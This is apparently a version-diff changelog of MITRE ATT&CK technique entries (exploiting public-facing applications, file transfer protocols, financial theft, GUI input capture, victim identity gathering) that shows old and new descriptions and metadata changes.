[Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Phishing](https://attack.mitre.org/techniques/T1566).(Citation: Mandiant APT1)Adversaries may create and cultivate accounts with services that can be used during targeting. Adversaries can create accounts that can be used to build a persona to further operations. Persona development consists of the development of public information, presence, history and appropriate affiliations. This development could be applied to social media, website, or other publicly available information that could be referenced and scrutinized for legitimacy over the course of an operation using that persona or identity.(Citation: NEWSCASTER2014)(Citation: BlackHatRobinSage) For operations incorporating social engineering, the utilization of an online persona may be important. These personas may be fictitious or impersonate real people. The persona may exist on a single site or across multiple sites (ex: Facebook, LinkedIn, Twitter, Google, GitHub, Docker Hub, etc.). Establishing a persona may require development of additional documentation to make them seem real. This could include filling out profile information, developing social networks, or incorporating photos.(Citation: NEWSCASTER2014)(Citation: BlackHatRobinSage) Establishing accounts can also include the creation of accounts with email providers, which may be directly leveraged for [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Phishing](https://attack.mitre.org/techniques/T1566).(Citation: Mandiant APT1) In addition, establishing accounts may allow adversaries to abuse free services, such as registering for trial periods to [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) for malicious purposes.(Citation: Free Trial PurpleUrchin)
x_mitre_version1.21.3
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Free Trial PurpleUrchin', 'description': 'Gamazo, William. Quist, Nathaniel.. (2023, January 5). PurpleUrchin Bypasses CAPTCHA and Steals Cloud Platform Resources. Retrieved February 28, 2024.', 'url': 'https://unit42.paloaltonetworks.com/purpleurchin-steals-cloud-resources/'}

[T1546] Event Triggered Execution

Current version: 1.3

Version changed from: 1.2 → 1.3

New Mitigations:

Details
values_changed
STIX FieldOld valueNew Value
modified2022-10-19 15:44:20.456000+00:002024-03-01 15:49:15.588000+00:00
x_mitre_attack_spec_version2.1.03.2.0
x_mitre_version1.21.3

[T1190] Exploit Public-Facing Application

Current version: 2.5

Version changed from: 2.4 → 2.5


Old Description
New Description
t1Adversaries may attempt to exploit a weakness in an Internett1Adversaries may attempt to exploit a weakness in an Internet
>-facing host or system to initially access a network. The we>-facing host or system to initially access a network. The we
>akness in the system can be a software bug, a temporary glit>akness in the system can be a software bug, a temporary glit
>ch, or a misconfiguration.  Exploited applications are often>ch, or a misconfiguration.  Exploited applications are often
> websites/web servers, but can also include databases (like > websites/web servers, but can also include databases (like 
>SQL), standard services (like SMB or SSH), network device ad>SQL), standard services (like SMB or SSH), network device ad
>ministration and management protocols (like SNMP and Smart I>ministration and management protocols (like SNMP and Smart I
>nstall), and any other system with Internet accessible open >nstall), and any other system with Internet accessible open 
>sockets.(Citation: NVD CVE-2016-6662)(Citation: CIS Multiple>sockets.(Citation: NVD CVE-2016-6662)(Citation: CIS Multiple
> SMB Vulnerabilities)(Citation: US-CERT TA18-106A Network In> SMB Vulnerabilities)(Citation: US-CERT TA18-106A Network In
>frastructure Devices 2018)(Citation: Cisco Blog Legacy Devic>frastructure Devices 2018)(Citation: Cisco Blog Legacy Devic
>e Attacks)(Citation: NVD CVE-2014-7169) Depending on the fla>e Attacks)(Citation: NVD CVE-2014-7169) Depending on the fla
>w being exploited this may also involve [Exploitation for De>w being exploited this may also involve [Exploitation for De
>fense Evasion](https://attack.mitre.org/techniques/T1211).  >fense Evasion](https://attack.mitre.org/techniques/T1211) or
> If an application is hosted on cloud-based infrastructure a> [Exploitation for Client Execution](https://attack.mitre.or
>nd/or is containerized, then exploiting it may lead to compr>g/techniques/T1203).  If an application is hosted on cloud-b
>omise of the underlying instance or container. This can allo>ased infrastructure and/or is containerized, then exploiting
>w an adversary a path to access the cloud or container APIs,> it may lead to compromise of the underlying instance or con
> exploit container host access via [Escape to Host](https://>tainer. This can allow an adversary a path to access the clo
>attack.mitre.org/techniques/T1611), or take advantage of wea>ud or container APIs, exploit container host access via [Esc
>k identity and access management policies.  Adversaries may >ape to Host](https://attack.mitre.org/techniques/T1611), or 
>also exploit edge network infrastructure and related applian>take advantage of weak identity and access management polici
>ces, specifically targeting devices that do not support robu>es.  Adversaries may also exploit edge network infrastructur
>st host-based defenses.(Citation: Mandiant Fortinet Zero Day>e and related appliances, specifically targeting devices tha
>)(Citation: Wired Russia Cyberwar)  For websites and databas>t do not support robust host-based defenses.(Citation: Mandi
>es, the OWASP top 10 and CWE top 25 highlight the most commo>ant Fortinet Zero Day)(Citation: Wired Russia Cyberwar)  For
>n web-based vulnerabilities.(Citation: OWASP Top 10)(Citatio> websites and databases, the OWASP top 10 and CWE top 25 hig
>n: CWE top 25)>hlight the most common web-based vulnerabilities.(Citation: 
 >OWASP Top 10)(Citation: CWE top 25)
Details
values_changed
STIX FieldOld valueNew Value
modified2023-04-14 22:18:39.190000+00:002023-11-28 21:27:35.373000+00:00
descriptionAdversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network. The weakness in the system can be a software bug, a temporary glitch, or a misconfiguration. Exploited applications are often websites/web servers, but can also include databases (like SQL), standard services (like SMB or SSH), network device administration and management protocols (like SNMP and Smart Install), and any other system with Internet accessible open sockets.(Citation: NVD CVE-2016-6662)(Citation: CIS Multiple SMB Vulnerabilities)(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)(Citation: Cisco Blog Legacy Device Attacks)(Citation: NVD CVE-2014-7169) Depending on the flaw being exploited this may also involve [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211). If an application is hosted on cloud-based infrastructure and/or is containerized, then exploiting it may lead to compromise of the underlying instance or container. This can allow an adversary a path to access the cloud or container APIs, exploit container host access via [Escape to Host](https://attack.mitre.org/techniques/T1611), or take advantage of weak identity and access management policies. Adversaries may also exploit edge network infrastructure and related appliances, specifically targeting devices that do not support robust host-based defenses.(Citation: Mandiant Fortinet Zero Day)(Citation: Wired Russia Cyberwar) For websites and databases, the OWASP top 10 and CWE top 25 highlight the most common web-based vulnerabilities.(Citation: OWASP Top 10)(Citation: CWE top 25)Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network. The weakness in the system can be a software bug, a temporary glitch, or a misconfiguration. Exploited applications are often websites/web servers, but can also include databases (like SQL), standard services (like SMB or SSH), network device administration and management protocols (like SNMP and Smart Install), and any other system with Internet accessible open sockets.(Citation: NVD CVE-2016-6662)(Citation: CIS Multiple SMB Vulnerabilities)(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)(Citation: Cisco Blog Legacy Device Attacks)(Citation: NVD CVE-2014-7169) Depending on the flaw being exploited this may also involve [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211) or [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203). If an application is hosted on cloud-based infrastructure and/or is containerized, then exploiting it may lead to compromise of the underlying instance or container. This can allow an adversary a path to access the cloud or container APIs, exploit container host access via [Escape to Host](https://attack.mitre.org/techniques/T1611), or take advantage of weak identity and access management policies. Adversaries may also exploit edge network infrastructure and related appliances, specifically targeting devices that do not support robust host-based defenses.(Citation: Mandiant Fortinet Zero Day)(Citation: Wired Russia Cyberwar) For websites and databases, the OWASP top 10 and CWE top 25 highlight the most common web-based vulnerabilities.(Citation: OWASP Top 10)(Citation: CWE top 25)
x_mitre_attack_spec_version3.1.03.2.0
x_mitre_version2.42.5

[T1090.002] Proxy: External Proxy

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.2.0
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2020-03-27 17:50:37.411000+00:002024-04-16 12:19:08.953000+00:00
x_mitre_version1.01.1
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_platformsNetwork

[T1071.002] Application Layer Protocol: File Transfer Protocols

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description
New Description
t1Adversaries may communicate using application layer protocolt1Adversaries may communicate using application layer protocol
>s associated with transferring files to avoid detection/netw>s associated with transferring files to avoid detection/netw
>ork filtering by blending in with existing traffic. Commands>ork filtering by blending in with existing traffic. Commands
> to the remote system, and often the results of those comman> to the remote system, and often the results of those comman
>ds, will be embedded within the protocol traffic between the>ds, will be embedded within the protocol traffic between the
> client and server.   Protocols such as SMB, FTP, FTPS, and > client and server.   Protocols such as SMB(Citation: US-CER
>TFTP that transfer files may be very common in environments.>T TA18-074A), FTP(Citation: ESET Machete July 2019), FTPS, a
>  Packets produced from these protocols may have many fields>nd TFTP that transfer files may be very common in environmen
> and headers in which data can be concealed. Data could also>ts.  Packets produced from these protocols may have many fie
> be concealed within the transferred files. An adversary may>lds and headers in which data can be concealed. Data could a
> abuse these protocols to communicate with systems under the>lso be concealed within the transferred files. An adversary 
>ir control within a victim network while also mimicking norm>may abuse these protocols to communicate with systems under 
>al, expected traffic. >their control within a victim network while also mimicking n
 >ormal, expected traffic. 
Details
values_changed
STIX FieldOld valueNew Value
modified2023-10-01 02:42:15.473000+00:002024-01-18 17:23:22.591000+00:00
descriptionAdversaries may communicate using application layer protocols associated with transferring files to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. Protocols such as SMB, FTP, FTPS, and TFTP that transfer files may be very common in environments. Packets produced from these protocols may have many fields and headers in which data can be concealed. Data could also be concealed within the transferred files. An adversary may abuse these protocols to communicate with systems under their control within a victim network while also mimicking normal, expected traffic. Adversaries may communicate using application layer protocols associated with transferring files to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. Protocols such as SMB(Citation: US-CERT TA18-074A), FTP(Citation: ESET Machete July 2019), FTPS, and TFTP that transfer files may be very common in environments. Packets produced from these protocols may have many fields and headers in which data can be concealed. Data could also be concealed within the transferred files. An adversary may abuse these protocols to communicate with systems under their control within a victim network while also mimicking normal, expected traffic.
x_mitre_version1.11.2
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'ESET Machete July 2019', 'description': 'ESET. (2019, July). MACHETE JUST GOT SHARPER Venezuelan government institutions under attack. Retrieved September 13, 2019.', 'url': 'https://www.welivesecurity.com/wp-content/uploads/2019/08/ESET_Machete.pdf'}
external_references{'source_name': 'US-CERT TA18-074A', 'description': 'US-CERT. (2018, March 16). Alert (TA18-074A): Russian Government Cyber Activity Targeting Energy and Other Critical Infrastructure Sectors. Retrieved June 6, 2018.', 'url': 'https://www.us-cert.gov/ncas/alerts/TA18-074A'}
x_mitre_platformsNetwork

[T1083] File and Directory Discovery

Current version: 1.6

Version changed from: 1.5 → 1.6


Old Description
New Description
t1Adversaries may enumerate files and directories or may searct1Adversaries may enumerate files and directories or may searc
>h in specific locations of a host or network share for certa>h in specific locations of a host or network share for certa
>in information within a file system. Adversaries may use the>in information within a file system. Adversaries may use the
> information from [File and Directory Discovery](https://att> information from [File and Directory Discovery](https://att
>ack.mitre.org/techniques/T1083) during automated discovery t>ack.mitre.org/techniques/T1083) during automated discovery t
>o shape follow-on behaviors, including whether or not the ad>o shape follow-on behaviors, including whether or not the ad
>versary fully infects the target and/or attempts specific ac>versary fully infects the target and/or attempts specific ac
>tions.  Many command shell utilities can be used to obtain t>tions.  Many command shell utilities can be used to obtain t
>his information. Examples include <code>dir</code>, <code>tr>his information. Examples include <code>dir</code>, <code>tr
>ee</code>, <code>ls</code>, <code>find</code>, and <code>loc>ee</code>, <code>ls</code>, <code>find</code>, and <code>loc
>ate</code>.(Citation: Windows Commands JPCERT) Custom tools >ate</code>.(Citation: Windows Commands JPCERT) Custom tools 
>may also be used to gather file and directory information an>may also be used to gather file and directory information an
>d interact with the [Native API](https://attack.mitre.org/te>d interact with the [Native API](https://attack.mitre.org/te
>chniques/T1106). Adversaries may also leverage a [Network De>chniques/T1106). Adversaries may also leverage a [Network De
>vice CLI](https://attack.mitre.org/techniques/T1059/008) on >vice CLI](https://attack.mitre.org/techniques/T1059/008) on 
>network devices to gather file and directory information (e.>network devices to gather file and directory information (e.
>g. <code>dir</code>, <code>show flash</code>, and/or <code>n>g. <code>dir</code>, <code>show flash</code>, and/or <code>n
>vram</code>).(Citation: US-CERT-TA18-106A)>vram</code>).(Citation: US-CERT-TA18-106A)  Some files and d
 >irectories may require elevated or specific user permissions
 > to access.
Details
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_system_requirements['Some folders may require Administrator, SYSTEM or specific user depending on permission levels and access controls']
values_changed
STIX FieldOld valueNew Value
modified2023-03-30 21:01:42.631000+00:002024-04-16 12:40:10.978000+00:00
descriptionAdversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions. Many command shell utilities can be used to obtain this information. Examples include dir, tree, ls, find, and locate.(Citation: Windows Commands JPCERT) Custom tools may also be used to gather file and directory information and interact with the [Native API](https://attack.mitre.org/techniques/T1106). Adversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to gather file and directory information (e.g. dir, show flash, and/or nvram).(Citation: US-CERT-TA18-106A)Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions. Many command shell utilities can be used to obtain this information. Examples include dir, tree, ls, find, and locate.(Citation: Windows Commands JPCERT) Custom tools may also be used to gather file and directory information and interact with the [Native API](https://attack.mitre.org/techniques/T1106). Adversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to gather file and directory information (e.g. dir, show flash, and/or nvram).(Citation: US-CERT-TA18-106A) Some files and directories may require elevated or specific user permissions to access.
x_mitre_attack_spec_version2.1.03.2.0
x_mitre_version1.51.6

[T1657] Financial Theft

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description
New Description
t1Adversaries may steal monetary resources from targets througt1Adversaries may steal monetary resources from targets throug
>h extortion, social engineering, technical theft, or other m>h extortion, social engineering, technical theft, or other m
>ethods aimed at their own financial gain at the expense of t>ethods aimed at their own financial gain at the expense of t
>he availability of these resources for victims. Financial th>he availability of these resources for victims. Financial th
>eft is the ultimate objective of several popular campaign ty>eft is the ultimate objective of several popular campaign ty
>pes including extortion by ransomware,(Citation: FBI-ransomw>pes including extortion by ransomware,(Citation: FBI-ransomw
>are) business email compromise (BEC) and fraud,(Citation: FB>are) business email compromise (BEC) and fraud,(Citation: FB
>I-BEC) "pig butchering,"(Citation: wired-pig butchering) ban>I-BEC) "pig butchering,"(Citation: wired-pig butchering) ban
>k hacking,(Citation: DOJ-DPRK Heist) and exploiting cryptocu>k hacking,(Citation: DOJ-DPRK Heist) and exploiting cryptocu
>rrency networks.(Citation: BBC-Ronin)   Adversaries may [Com>rrency networks.(Citation: BBC-Ronin)   Adversaries may [Com
>promise Accounts](https://attack.mitre.org/techniques/T1586)>promise Accounts](https://attack.mitre.org/techniques/T1586)
> to conduct unauthorized transfers of funds.(Citation: Inter> to conduct unauthorized transfers of funds.(Citation: Inter
>net crime report 2022) In the case of business email comprom>net crime report 2022) In the case of business email comprom
>ise or email fraud, an adversary may utilize [Impersonation]>ise or email fraud, an adversary may utilize [Impersonation]
>(https://attack.mitre.org/techniques/T1656) of a trusted ent>(https://attack.mitre.org/techniques/T1656) of a trusted ent
>ity. Once the social engineering is successful, victims can >ity. Once the social engineering is successful, victims can 
>be deceived into sending money to financial accounts control>be deceived into sending money to financial accounts control
>led by an adversary.(Citation: FBI-BEC) This creates the pot>led by an adversary.(Citation: FBI-BEC) This creates the pot
>ential for multiple victims (i.e., compromised accounts as w>ential for multiple victims (i.e., compromised accounts as w
>ell as the ultimate monetary loss) in incidents involving fi>ell as the ultimate monetary loss) in incidents involving fi
>nancial theft.(Citation: VEC)  Extortion by ransomware may o>nancial theft.(Citation: VEC)  Extortion by ransomware may o
>ccur, for example, when an adversary demands payment from a >ccur, for example, when an adversary demands payment from a 
>victim after [Data Encrypted for Impact](https://attack.mitr>victim after [Data Encrypted for Impact](https://attack.mitr
>e.org/techniques/T1486) (Citation: NYT-Colonial) and [Exfilt>e.org/techniques/T1486) (Citation: NYT-Colonial) and [Exfilt
>ration](https://attack.mitre.org/tactics/TA0010) of data, fo>ration](https://attack.mitre.org/tactics/TA0010) of data, fo
>llowed by threatening public exposure unless payment is made>llowed by threatening to leak sensitive data to the public u
> to the adversary.(Citation: Mandiant-leaks)  Due to the pot>nless payment is made to the adversary.(Citation: Mandiant-l
>entially immense business impact of financial theft, an adve>eaks) Adversaries may use dedicated leak sites to distribute
>rsary may abuse the possibility of financial theft and seeki> victim data.(Citation: Crowdstrike-leaks)  Due to the poten
>ng monetary gain to divert attention from their true goals s>tially immense business impact of financial theft, an advers
>uch as [Data Destruction](https://attack.mitre.org/technique>ary may abuse the possibility of financial theft and seeking
>s/T1485) and business disruption.(Citation: AP-NotPetya)> monetary gain to divert attention from their true goals suc
 >h as [Data Destruction](https://attack.mitre.org/techniques/
 >T1485) and business disruption.(Citation: AP-NotPetya)
Details
values_changed
STIX FieldOld valueNew Value
modified2023-09-30 19:54:11.916000+00:002024-04-11 20:22:14.359000+00:00
descriptionAdversaries may steal monetary resources from targets through extortion, social engineering, technical theft, or other methods aimed at their own financial gain at the expense of the availability of these resources for victims. Financial theft is the ultimate objective of several popular campaign types including extortion by ransomware,(Citation: FBI-ransomware) business email compromise (BEC) and fraud,(Citation: FBI-BEC) "pig butchering,"(Citation: wired-pig butchering) bank hacking,(Citation: DOJ-DPRK Heist) and exploiting cryptocurrency networks.(Citation: BBC-Ronin) Adversaries may [Compromise Accounts](https://attack.mitre.org/techniques/T1586) to conduct unauthorized transfers of funds.(Citation: Internet crime report 2022) In the case of business email compromise or email fraud, an adversary may utilize [Impersonation](https://attack.mitre.org/techniques/T1656) of a trusted entity. Once the social engineering is successful, victims can be deceived into sending money to financial accounts controlled by an adversary.(Citation: FBI-BEC) This creates the potential for multiple victims (i.e., compromised accounts as well as the ultimate monetary loss) in incidents involving financial theft.(Citation: VEC) Extortion by ransomware may occur, for example, when an adversary demands payment from a victim after [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486) (Citation: NYT-Colonial) and [Exfiltration](https://attack.mitre.org/tactics/TA0010) of data, followed by threatening public exposure unless payment is made to the adversary.(Citation: Mandiant-leaks) Due to the potentially immense business impact of financial theft, an adversary may abuse the possibility of financial theft and seeking monetary gain to divert attention from their true goals such as [Data Destruction](https://attack.mitre.org/techniques/T1485) and business disruption.(Citation: AP-NotPetya)Adversaries may steal monetary resources from targets through extortion, social engineering, technical theft, or other methods aimed at their own financial gain at the expense of the availability of these resources for victims. Financial theft is the ultimate objective of several popular campaign types including extortion by ransomware,(Citation: FBI-ransomware) business email compromise (BEC) and fraud,(Citation: FBI-BEC) "pig butchering,"(Citation: wired-pig butchering) bank hacking,(Citation: DOJ-DPRK Heist) and exploiting cryptocurrency networks.(Citation: BBC-Ronin) Adversaries may [Compromise Accounts](https://attack.mitre.org/techniques/T1586) to conduct unauthorized transfers of funds.(Citation: Internet crime report 2022) In the case of business email compromise or email fraud, an adversary may utilize [Impersonation](https://attack.mitre.org/techniques/T1656) of a trusted entity. Once the social engineering is successful, victims can be deceived into sending money to financial accounts controlled by an adversary.(Citation: FBI-BEC) This creates the potential for multiple victims (i.e., compromised accounts as well as the ultimate monetary loss) in incidents involving financial theft.(Citation: VEC) Extortion by ransomware may occur, for example, when an adversary demands payment from a victim after [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486) (Citation: NYT-Colonial) and [Exfiltration](https://attack.mitre.org/tactics/TA0010) of data, followed by threatening to leak sensitive data to the public unless payment is made to the adversary.(Citation: Mandiant-leaks) Adversaries may use dedicated leak sites to distribute victim data.(Citation: Crowdstrike-leaks) Due to the potentially immense business impact of financial theft, an adversary may abuse the possibility of financial theft and seeking monetary gain to divert attention from their true goals such as [Data Destruction](https://attack.mitre.org/techniques/T1485) and business disruption.(Citation: AP-NotPetya)
x_mitre_version1.01.1
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Crowdstrike-leaks', 'description': 'Crowdstrike. (2020, September 24). Double Trouble: Ransomware with Data Leak Extortion, Part 1. Retrieved December 6, 2023.', 'url': 'https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/'}
x_mitre_contributorsGoldstein Menachem

[T1056.002] Input Capture: GUI Input Capture

Current version: 1.3

Version changed from: 1.2 → 1.3


Old Description
New Description
t1Adversaries may mimic common operating system GUI componentst1Adversaries may mimic common operating system GUI components
> to prompt users for credentials with a seemingly legitimate> to prompt users for credentials with a seemingly legitimate
> prompt. When programs are executed that need additional pri> prompt. When programs are executed that need additional pri
>vileges than are present in the current user context, it is >vileges than are present in the current user context, it is 
>common for the operating system to prompt the user for prope>common for the operating system to prompt the user for prope
>r credentials to authorize the elevated privileges for the t>r credentials to authorize the elevated privileges for the t
>ask (ex: [Bypass User Account Control](https://attack.mitre.>ask (ex: [Bypass User Account Control](https://attack.mitre.
>org/techniques/T1548/002)).  Adversaries may mimic this func>org/techniques/T1548/002)).  Adversaries may mimic this func
>tionality to prompt users for credentials with a seemingly l>tionality to prompt users for credentials with a seemingly l
>egitimate prompt for a number of reasons that mimic normal u>egitimate prompt for a number of reasons that mimic normal u
>sage, such as a fake installer requiring additional access o>sage, such as a fake installer requiring additional access o
>r a fake malware removal suite.(Citation: OSX Malware Exploi>r a fake malware removal suite.(Citation: OSX Malware Exploi
>ts MacKeeper) This type of prompt can be used to collect cre>ts MacKeeper) This type of prompt can be used to collect cre
>dentials via various languages such as [AppleScript](https:/>dentials via various languages such as [AppleScript](https:/
>/attack.mitre.org/techniques/T1059/002)(Citation: LogRhythm >/attack.mitre.org/techniques/T1059/002)(Citation: LogRhythm 
>Do You Trust Oct 2014)(Citation: OSX Keydnap malware)(Citati>Do You Trust Oct 2014)(Citation: OSX Keydnap malware)(Citati
>on: Spoofing credential dialogs) and [PowerShell](https://at>on: Spoofing credential dialogs) and [PowerShell](https://at
>tack.mitre.org/techniques/T1059/001).(Citation: LogRhythm Do>tack.mitre.org/techniques/T1059/001).(Citation: LogRhythm Do
> You Trust Oct 2014)(Citation: Enigma Phishing for Credentia> You Trust Oct 2014)(Citation: Enigma Phishing for Credentia
>ls Jan 2015)(Citation: Spoofing credential dialogs) On Linux>ls Jan 2015)(Citation: Spoofing credential dialogs) On Linux
> systems adversaries may launch dialog boxes prompting users> systems adversaries may launch dialog boxes prompting users
> for credentials from malicious shell scripts or the command> for credentials from malicious shell scripts or the command
> line (i.e. [Unix Shell](https://attack.mitre.org/techniques> line (i.e. [Unix Shell](https://attack.mitre.org/techniques
>/T1059/004)).(Citation: Spoofing credential dialogs) >/T1059/004)).(Citation: Spoofing credential dialogs)  Advers
 >aries may also mimic common software authentication requests
 >, such as those from browsers or email clients. This may als
 >o be paired with user activity monitoring (i.e., [Browser In
 >formation Discovery](https://attack.mitre.org/techniques/T12
 >17) and/or [Application Window Discovery](https://attack.mit
 >re.org/techniques/T1010)) to spoof prompts when users are na
 >turally accessing sensitive sites/data.
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_permissions_required['User']
values_changed
STIX FieldOld valueNew Value
modified2023-03-30 21:01:48.279000+00:002024-04-15 23:39:31.474000+00:00
descriptionAdversaries may mimic common operating system GUI components to prompt users for credentials with a seemingly legitimate prompt. When programs are executed that need additional privileges than are present in the current user context, it is common for the operating system to prompt the user for proper credentials to authorize the elevated privileges for the task (ex: [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002)). Adversaries may mimic this functionality to prompt users for credentials with a seemingly legitimate prompt for a number of reasons that mimic normal usage, such as a fake installer requiring additional access or a fake malware removal suite.(Citation: OSX Malware Exploits MacKeeper) This type of prompt can be used to collect credentials via various languages such as [AppleScript](https://attack.mitre.org/techniques/T1059/002)(Citation: LogRhythm Do You Trust Oct 2014)(Citation: OSX Keydnap malware)(Citation: Spoofing credential dialogs) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).(Citation: LogRhythm Do You Trust Oct 2014)(Citation: Enigma Phishing for Credentials Jan 2015)(Citation: Spoofing credential dialogs) On Linux systems adversaries may launch dialog boxes prompting users for credentials from malicious shell scripts or the command line (i.e. [Unix Shell](https://attack.mitre.org/techniques/T1059/004)).(Citation: Spoofing credential dialogs) Adversaries may mimic common operating system GUI components to prompt users for credentials with a seemingly legitimate prompt. When programs are executed that need additional privileges than are present in the current user context, it is common for the operating system to prompt the user for proper credentials to authorize the elevated privileges for the task (ex: [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002)). Adversaries may mimic this functionality to prompt users for credentials with a seemingly legitimate prompt for a number of reasons that mimic normal usage, such as a fake installer requiring additional access or a fake malware removal suite.(Citation: OSX Malware Exploits MacKeeper) This type of prompt can be used to collect credentials via various languages such as [AppleScript](https://attack.mitre.org/techniques/T1059/002)(Citation: LogRhythm Do You Trust Oct 2014)(Citation: OSX Keydnap malware)(Citation: Spoofing credential dialogs) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).(Citation: LogRhythm Do You Trust Oct 2014)(Citation: Enigma Phishing for Credentials Jan 2015)(Citation: Spoofing credential dialogs) On Linux systems adversaries may launch dialog boxes prompting users for credentials from malicious shell scripts or the command line (i.e. [Unix Shell](https://attack.mitre.org/techniques/T1059/004)).(Citation: Spoofing credential dialogs) Adversaries may also mimic common software authentication requests, such as those from browsers or email clients. This may also be paired with user activity monitoring (i.e., [Browser Information Discovery](https://attack.mitre.org/techniques/T1217) and/or [Application Window Discovery](https://attack.mitre.org/techniques/T1010)) to spoof prompts when users are naturally accessing sensitive sites/data.
x_mitre_attack_spec_version3.1.03.2.0
x_mitre_version1.21.3

[T1589] Gather Victim Identity Information

Current version: 1.3

Version changed from: 1.2 → 1.3


Old Description
New Description
t1Adversaries may gather information about the victim's identit1Adversaries may gather information about the victim's identi
>ty that can be used during targeting. Information about iden>ty that can be used during targeting. Information about iden
>tities may include a variety of details, including personal >tities may include a variety of details, including personal 
>data (ex: employee names, email addresses, etc.) as well as >data (ex: employee names, email addresses, security question
>sensitive details such as credentials.  Adversaries may gath> responses, etc.) as well as sensitive details such as crede
>er this information in various ways, such as direct elicitat>ntials or multi-factor authentication (MFA) configurations. 
>ion via [Phishing for Information](https://attack.mitre.org/> Adversaries may gather this information in various ways, su
>techniques/T1598). Information about users could also be enu>ch as direct elicitation via [Phishing for Information](http
>merated via other active means (i.e. [Active Scanning](https>s://attack.mitre.org/techniques/T1598). Information about us
>://attack.mitre.org/techniques/T1595)) such as probing and a>ers could also be enumerated via other active means (i.e. [A
>nalyzing responses from authentication services that may rev>ctive Scanning](https://attack.mitre.org/techniques/T1595)) 
>eal valid usernames in a system.(Citation: GrimBlog Username>such as probing and analyzing responses from authentication 
>Enum) Information about victims may also be exposed to adver>services that may reveal valid usernames in a system or perm
>saries via online or other accessible data sets (ex: [Social>itted MFA /methods associated with those usernames.(Citation
> Media](https://attack.mitre.org/techniques/T1593/001) or [S>: GrimBlog UsernameEnum)(Citation: Obsidian SSPR Abuse 2023)
>earch Victim-Owned Websites](https://attack.mitre.org/techni> Information about victims may also be exposed to adversarie
>ques/T1594)).(Citation: OPM Leak)(Citation: Register Deloitt>s via online or other accessible data sets (ex: [Social Medi
>e)(Citation: Register Uber)(Citation: Detectify Slack Tokens>a](https://attack.mitre.org/techniques/T1593/001) or [Search
>)(Citation: Forbes GitHub Creds)(Citation: GitHub truffleHog> Victim-Owned Websites](https://attack.mitre.org/techniques/
>)(Citation: GitHub Gitrob)(Citation: CNET Leaks)  Gathering >T1594)).(Citation: OPM Leak)(Citation: Register Deloitte)(Ci
>this information may reveal opportunities for other forms of>tation: Register Uber)(Citation: Detectify Slack Tokens)(Cit
> reconnaissance (ex: [Search Open Websites/Domains](https://>ation: Forbes GitHub Creds)(Citation: GitHub truffleHog)(Cit
>attack.mitre.org/techniques/T1593) or [Phishing for Informat>ation: GitHub Gitrob)(Citation: CNET Leaks)  Gathering this 
>ion](https://attack.mitre.org/techniques/T1598)), establishi>information may reveal opportunities for other forms of reco
>ng operational resources (ex: [Compromise Accounts](https://>nnaissance (ex: [Search Open Websites/Domains](https://attac
>attack.mitre.org/techniques/T1586)), and/or initial access (>k.mitre.org/techniques/T1593) or [Phishing for Information](
>ex: [Phishing](https://attack.mitre.org/techniques/T1566) or>https://attack.mitre.org/techniques/T1598)), establishing op
> [Valid Accounts](https://attack.mitre.org/techniques/T1078)>erational resources (ex: [Compromise Accounts](https://attac
>).>k.mitre.org/techniques/T1586)), and/or initial access (ex: [
 >Phishing](https://attack.mitre.org/techniques/T1566) or [Val
 >id Accounts](https://attack.mitre.org/techniques/T1078)).
Details
values_changed
STIX FieldOld valueNew Value
modified2022-04-21 14:39:39.857000+00:002024-04-19 04:27:00.005000+00:00
